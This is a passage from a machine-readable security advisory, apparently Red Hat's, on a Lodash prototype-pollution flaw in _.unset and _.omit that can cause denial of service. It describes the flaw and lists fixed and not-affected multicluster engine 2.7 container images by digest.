"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431740"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "lodash: prototype pollution in _.unset and _.omit functions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue is only exploitable by applications using the _.unset and _.omit functions on an object and allowing user input to determine the path of the property to be removed. This issue only allows the deletion of properties but does not allow overwriting their behavior, limiting the impact to a denial of service. Due to this reason, this vulnerability has been rated with an important severity.\n\nIn Grafana, JavaScript code runs only in the browser, while the server side is all Golang. Therefore, the worst-case scenario is a loss of functionality in the client application inside the browser. To reflect this, the CVSS availability metric and the severity of the Grafana and the Grafana-PCP component have been updated to low and moderate, respectively.\n\nThe lodash dependency is bundled and used by the pcs-web-ui component of the PCS package. In Red Hat Enterprise Linux 8.10, the pcs-web-ui component is no longer included in the PCS package. As a result, RHEL 8.10 does not ship the vulnerable lodash component within PCS and is therefore not-affected by this CVE.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64"
],
"known_not_affected": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
